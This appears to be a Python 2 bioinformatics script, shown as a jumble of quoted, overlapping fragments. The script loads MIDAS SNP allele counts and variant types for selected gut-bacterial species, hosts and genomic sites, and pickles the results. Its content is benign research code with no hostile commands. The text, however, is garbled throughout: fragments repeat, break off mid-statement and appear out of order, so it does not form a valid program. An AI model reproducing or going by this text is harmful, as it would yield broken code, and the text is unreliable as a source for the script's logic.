post-processed", "= [(contig, location) for contig, location, gene_id in desired_sites] # SNPs directory snps_dir", "tuples # TODO: move to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[],", "(allele identity and counts) # for small set of given QP pairs at", "snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if sample", "and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items = line.split()", "desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites = [] for gene_id, contig, location", "sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file = bz2.BZ2File(\"%s/snps_alt_allele.txt.bz2\" % snps_dir, 'r') items", "up pickle directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p", "specific information (allele identity and counts) # for small set of given QP", "sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig,", "[('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421',", "polarization = 'R' # note R was assigned indiscriminately pvalue = float(info_items[5]) #", "= (ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps information # ===================================================================== #", "\\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\", "= defaultdict(dict) # Map: site (contig, location, gene_id) -> variant type variant_type_map =", "Process annotated_snps information # ===================================================================== # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\"", "idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in", "\"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' % pdir) # Store these two dicts", "= snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if", "# sample -> site -> (ref allele, alt allele) sample_site_allele_dict = defaultdict(dict) #", "this site for all desired samples for idx in desired_sample_idxs: alt, depth =", "without gene names desired_sites_no_gene = [(contig, location) for contig, location, gene_id in desired_sites]", "if (contig, location) not in desired_sites_no_gene: continue for idx in desired_sample_idxs: alt_allele =", "% snps_dir, 'r') items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for", "allele_counts_map = defaultdict(dict) # Map: site (contig, location, gene_id) -> variant type variant_type_map", "sites # sites are given as gene_id, contig, location tuples # inconsistent but", "these two dicts for each host-species pair for subjects, species, sites in desired_host_species_sites:", "gene_id) tuples # TODO: move to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[],", "'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351),", "desired_sites.append((contig, location, gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples,", "\\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741',", "gene_name)] = variant_type # Store alt and depth counts at this site for", "'r') # ===================================================================== # Process allele information # ===================================================================== # sample -> site", "about site info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) gene_name =", "gene_name) not in desired_sites: continue # Store variant type variant_type_map[(contig, location, gene_name)] =", "Desired samples and sites # sites are given as gene_id, contig, location tuples", "at sites of interest if (contig, location, gene_name) not in desired_sites: continue #", "Store these two dicts for each host-species pair for subjects, species, sites in", "site info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) gene_name = info_items[2]", "# Set up pickle directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir)", "'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001',", "sites are provided as (contig, location, gene_id) tuples # TODO: move to parse_midas_data", "are provided as (contig, location, gene_id) tuples # TODO: move to parse_midas_data later", "MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # ===================================================================== # Process allele", "continue for idx in desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)]", "(['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites", "sample_utils as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as", "('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads allele counts", "# Only look at sites of interest if (contig, location, gene_name) not in", "\\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\", "items = snp_alleles_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples:", "later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without gene", "% snps_dir, 'r') # ===================================================================== # Process allele information # ===================================================================== # sample", "= snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" %", "sites: desired_sites.append((contig, location, gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species,", "given sites from utils import sample_utils as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils,", "few things subject_sample_map = su.parse_subject_sample_map() # Set up pickle directory ddir = config.data_directory", "(ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps information # ===================================================================== # Open", "('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96',", "directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' %", "in desired_sites: continue # Store variant type variant_type_map[(contig, location, gene_name)] = variant_type #", "desired_host_species_sites: # Get all samples within the host desired_samples = [] for subject", "-> site -> (ref allele, alt allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt", "snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few things subject_sample_map = su.parse_subject_sample_map()", "list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample))", "'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171',", "location in sites: desired_sites.append((contig, location, gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map", "in desired_sample_idxs: alt, depth = [float(num) for num in items[1+idx].split(\",\")] sample = samples[idx]", "as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as np", "about site info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) ref_allele =", "ref_allele = info_items[2] if (contig, location) not in desired_sites_no_gene: continue for idx in", "= 0 # Loop over sites in annotated_snps.txt file for line in snp_file:", "= [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\", "in sites: desired_sites.append((contig, location, gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map =", "contig, location tuples # inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\", "output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists of desired sample", "# sites are given as gene_id, contig, location tuples # inconsistent but bleh", "gene names desired_sites_no_gene = [(contig, location) for contig, location, gene_id in desired_sites] #", "= info_items[0] location = long(info_items[1]) ref_allele = info_items[2] if (contig, location) not in", "desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ #", "snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # Get lists of desired sample idxs", "all samples within the host desired_samples = [] for subject in subjects: desired_samples", "sys # Desired samples and sites # sites are given as gene_id, contig,", "'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264',", "identity and counts) # for small set of given QP pairs at given", "\\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\", "# =========================================================================== # Loads allele counts for specific samples at specific sites #", "snp_alleles_file.close() # ===================================================================== # Process annotated_snps information # ===================================================================== # Open post-processed MIDAS", "'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264',", "to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version", "for idx in desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] =", "collections import defaultdict import pickle import bz2 import numpy import os, sys #", "[('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065',", "\\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171', 5687L)])] # desired_host_species_sites =", "= [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I',", "'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.2283', 'JGDJ01000171', 5687L), \\ ('1339327.3.peg.2283', 'JGDJ01000171',", "snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # ===================================================================== # Process allele information #", "host desired_samples = [] for subject in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat", "if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for line in snp_alleles_file: items", "for num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth)", "= info_items[0] location = long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3] polarization =", "for sample in desired_samples: if sample in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) for", "snp_alleles_file: items = line.split() # Load information about site info_items = items[0].split(\"|\") contig", "=========================================================================== # Loads allele counts for specific samples at specific sites # where", "= su.parse_subject_sample_map() # Set up pickle directory ddir = config.data_directory pdir = \"%s/pickles/reversion_examples/\"", "= snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs = [] for sample in desired_samples: if", "= long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3] polarization = 'R' # note", "9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L),", "if (contig, location, gene_name) not in desired_sites: continue # Store variant type variant_type_map[(contig,", "Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map), open('%s/allele_info_%s_%s.pkl' % (pdir, ('_').join(subjects), species), 'wb')) sys.stderr.write(\"Done!\\n\")", "= line.split() # Load information about site info_items = items[0].split(\"|\") contig = info_items[0]", "sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps information #", "host-species pair for subjects, species, sites in desired_host_species_sites: # Get all samples within", "location)] = (ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps information # =====================================================================", "sample_site_allele_dict, variant_type_map # Load a few things subject_sample_map = su.parse_subject_sample_map() # Set up", "for subjects, species, sites in desired_host_species_sites: # Get all samples within the host", "'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\ 'Bacteroides_fragilis_54507',", "random as np_random, randint import random from collections import defaultdict import pickle import", "line in snp_alleles_file: items = line.split() # Load information about site info_items =", "site info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) ref_allele = info_items[2]", "at this site for all desired samples for idx in desired_sample_idxs: alt, depth", "items = line.split() # Load information about site info_items = items[0].split(\"|\") contig =", "= long(info_items[1]) ref_allele = info_items[2] if (contig, location) not in desired_sites_no_gene: continue for", "\\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001', 35625L)]), \\ (['1-I'], \\", "file for line in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" %", "subject in subjects: desired_samples += subject_sample_map[subject].keys() # Reformat sites desired_sites = [] for", "('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples =", "Store alt and depth counts at this site for all desired samples for", "samples[idx] allele_counts_map[sample][(contig, location, gene_name)] = (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map #", "move to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate", "in samples: desired_sample_idxs.append(samples.index(sample)) desired_sample_idxs = numpy.array(sorted(desired_sample_idxs)) # Map: sample -> site (contig, location,", "\\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\", "for small set of given QP pairs at given sites from utils import", "site for all desired samples for idx in desired_sample_idxs: alt, depth = [float(num)", "[('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358),", "contig, location, gene_id in desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\" % (config.data_directory,", "Process allele information # ===================================================================== # sample -> site -> (ref allele, alt", "===================================================================== # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') #", "information # ===================================================================== # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir,", "\\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\", "indiscriminately pvalue = float(info_items[5]) # Only look at sites of interest if (contig,", "%s' % pdir) # Store these two dicts for each host-species pair for", "(['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235']", "Store variant type variant_type_map[(contig, location, gene_name)] = variant_type # Store alt and depth", "samples for idx in desired_sample_idxs: alt, depth = [float(num) for num in items[1+idx].split(\",\")]", "'JGDJ01000264', 9480L)]), \\ (['M0901-C'], \\ 'Blautia_wexlerae_56130', \\ [('1121115.4.peg.32', 'AXVN01000001', 35625L), \\ ('1121115.4.peg.32', 'AXVN01000001',", "each host-species pair for subjects, species, sites in desired_host_species_sites: # Get all samples", "# TODO: move to parse_midas_data later # =========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'):", "pvalue = float(info_items[5]) # Only look at sites of interest if (contig, location,", "parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without gene names desired_sites_no_gene = [(contig,", "location, gene_name)] = (alt, depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a", "(contig, location, gene_id) -> variant type variant_type_map = {} num_sites_processed = 0 #", "random from collections import defaultdict import pickle import bz2 import numpy import os,", "= parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict, variant_type_map), open('%s/allele_info_%s_%s.pkl' %", "(['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'],", "= samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps", "two dicts for each host-species pair for subjects, species, sites in desired_host_species_sites: #", "# Store alt and depth counts at this site for all desired samples", "= bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # ===================================================================== # Process allele information # =====================================================================", "site (contig, location, gene_id) -> allele count allele_counts_map = defaultdict(dict) # Map: site", "'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577),", "depth) snp_file.close() return allele_counts_map, sample_site_allele_dict, variant_type_map # Load a few things subject_sample_map =", "'ERR3406235'] # =========================================================================== # Loads allele counts for specific samples at specific sites", "'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001',", "# desired_samples = ['ERR3405741', 'ERR3405661', 'ERR3406235'] # =========================================================================== # Loads allele counts for", "'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L), \\ ('435590.9.peg.1499', 'NC_009614', 1915720L)]), \\ (['3-I'], \\ 'Bifidobacterium_catenulatum_58257',", "desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\")", "numpy import os, sys # Desired samples and sites # sites are given", "information about site info_items = items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) gene_name", "'Bifidobacterium_catenulatum_58257', \\ [('566552.4.peg.96', 'NZ_ABXY01000001', 124565L), \\ ('566552.4.peg.96', 'NZ_ABXY01000001', 124565L)]), \\ (['67-I'], \\ 'Bacteroides_fragilis_54507',", "in desired_sites] # SNPs directory snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name) # Load", "allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) # Pickle dicts sys.stderr.write(\"Pickling...\\n\") pickle.dump((allele_counts_map, sample_site_allele_dict,", "as np_random, randint import random from collections import defaultdict import pickle import bz2", "Alternate version without gene names desired_sites_no_gene = [(contig, location) for contig, location, gene_id", "location tuples # inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499',", "# desired_host_species_sites = [(['C02143-I', 'C02143-M'], 'Bifidobacterium_bifidum_55065', [('500634.3.peg.1861','AWSW01000054',37945), ('500634.3.peg.945','AWSW01000030',35925), ('500634.3.peg.1636','AWSW01000046',21960), ('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\", "gene_name = info_items[2] variant_type = info_items[3] polarization = 'R' # note R was", "alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close() #", "location = long(info_items[1]) ref_allele = info_items[2] if (contig, location) not in desired_sites_no_gene: continue", "import random from collections import defaultdict import pickle import bz2 import numpy import", "info_items[0] location = long(info_items[1]) ref_allele = info_items[2] if (contig, location) not in desired_sites_no_gene:", "where sites are provided as (contig, location, gene_id) tuples # TODO: move to", "over sites in annotated_snps.txt file for line in snp_file: if num_sites_processed>0 and num_sites_processed%10000==0:", "samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close() # ===================================================================== # Process annotated_snps information", "= config.data_directory pdir = \"%s/pickles/reversion_examples/\" % (ddir) os.system('mkdir -p %s' % pdir) #", "temporal_changes_utils, snps_utils, core_gene_utils, gene_diversity_utils import numpy as np from numpy.random import choice, random", "-> (ref allele, alt allele) sample_site_allele_dict = defaultdict(dict) # Load snps_alt_allele.txt snp_alleles_file =", "= info_items[2] variant_type = info_items[3] polarization = 'R' # note R was assigned", "# Load a few things subject_sample_map = su.parse_subject_sample_map() # Set up pickle directory", "if num_sites_processed>0 and num_sites_processed%10000==0: sys.stderr.write(\"%d0k sites processed...\\n\" % (num_sites_processed/10000)) num_sites_processed += 1 items", "num_sites_processed += 1 items = line.split() # Load information about site info_items =", "variant_type # Store alt and depth counts at this site for all desired", "# note R was assigned indiscriminately pvalue = float(info_items[5]) # Only look at", "set of given QP pairs at given sites from utils import sample_utils as", "variant_type_map = {} num_sites_processed = 0 # Loop over sites in annotated_snps.txt file", "the host desired_samples = [] for subject in subjects: desired_samples += subject_sample_map[subject].keys() #", "= items[0].split(\"|\") contig = info_items[0] location = long(info_items[1]) gene_name = info_items[2] variant_type =", "Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\" % snps_dir, 'r') # ===================================================================== #", "= \"%s/snps/%s/\" % (config.data_directory, species_name) # Load population freqs (for polarization purposes) population_freqs", "population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS output snp_file = bz2.BZ2File(\"%s/annotated_snps.txt.bz2\"", "sites are given as gene_id, contig, location tuples # inconsistent but bleh desired_host_species_sites", "Map: sample -> site (contig, location, gene_id) -> allele count allele_counts_map = defaultdict(dict)", "Get lists of desired sample idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs", "# inconsistent but bleh desired_host_species_sites = [(['M0806-C'], \\ 'Bacteroides_vulgatus_57955', \\ [('435590.9.peg.1499', 'NC_009614', 1915720L),", "desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close()", "location = long(info_items[1]) gene_name = info_items[2] variant_type = info_items[3] polarization = 'R' #", "depth = [float(num) for num in items[1+idx].split(\",\")] sample = samples[idx] allele_counts_map[sample][(contig, location, gene_name)]", "specific sites # where sites are provided as (contig, location, gene_id) tuples #", "pickle import bz2 import numpy import os, sys # Desired samples and sites", "(contig, location, gene_id) tuples # TODO: move to parse_midas_data later # =========================================================================== def", "directory snps_dir = \"%s/snps/%s/\" % (config.data_directory, species_name) # Load population freqs (for polarization", "freqs (for polarization purposes) population_freqs = snps_utils.parse_population_freqs(prev_cohort, species_name, polarize_by_consensus=False) # Open post-processed MIDAS", "gene_id)) # Obtain desired dicts allele_counts_map, sample_site_allele_dict, variant_type_map = parse_snps_specify_sites_details(species, desired_samples, desired_sites=desired_sites) #", "desired_sites=[], prev_cohort='all'): # Alternate version without gene names desired_sites_no_gene = [(contig, location) for", "desired samples for idx in desired_sample_idxs: alt, depth = [float(num) for num in", "sites from utils import sample_utils as su, parse_midas_data, substitution_rates_utils, config, temporal_changes_utils, snps_utils, core_gene_utils,", "=========================================================================== def parse_snps_specify_sites_details(species_name, desired_samples=[], desired_sites=[], prev_cohort='all'): # Alternate version without gene names desired_sites_no_gene", "= items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele, alt_allele) snp_alleles_file.close() # =====================================================================", "# where sites are provided as (contig, location, gene_id) tuples # TODO: move", "(['67-I'], \\ 'Bacteroides_fragilis_54507', \\ [('1339327.3.peg.4421', 'JGDJ01000264', 9480L), \\ ('1339327.3.peg.4421', 'JGDJ01000264', 9480L)]), \\ (['M0901-C'],", "import pickle import bz2 import numpy import os, sys # Desired samples and", "lists of desired sample idxs items = snp_file.readline().strip().split()[1:] samples = list(su.parse_merged_sample_names(items)) desired_sample_idxs =", "depth counts at this site for all desired samples for idx in desired_sample_idxs:", "('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] # desired_samples", "('500634.3.peg.875','AWSW01000027',7916), ('500634.3.peg.952','AWSW01000030',45351), ('500634.3.peg.1619','AWSW01000046',4226)]), \\ # (['59-I', '59-M'], 'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), ('592977.3.peg.1732','JGZQ01000009',58203), ('592977.3.peg.1705','JGZQ01000009',29026)])] #", "idx in desired_sample_idxs: alt_allele = items[1+idx] sample = samples[idx] sample_site_allele_dict[sample][(contig, location)] = (ref_allele,", "'Bifidobacterium_adolescentis_56815', [('592977.3.peg.642','JGZQ01000005',14361),('592977.3.peg.860','JGZQ01000006',69020),('592977.3.peg.1216','JGZQ01000008',284119),('592977.3.peg.1129','JGZQ01000008',186577), ('592977.3.peg.39','JGZQ01000001',53358), 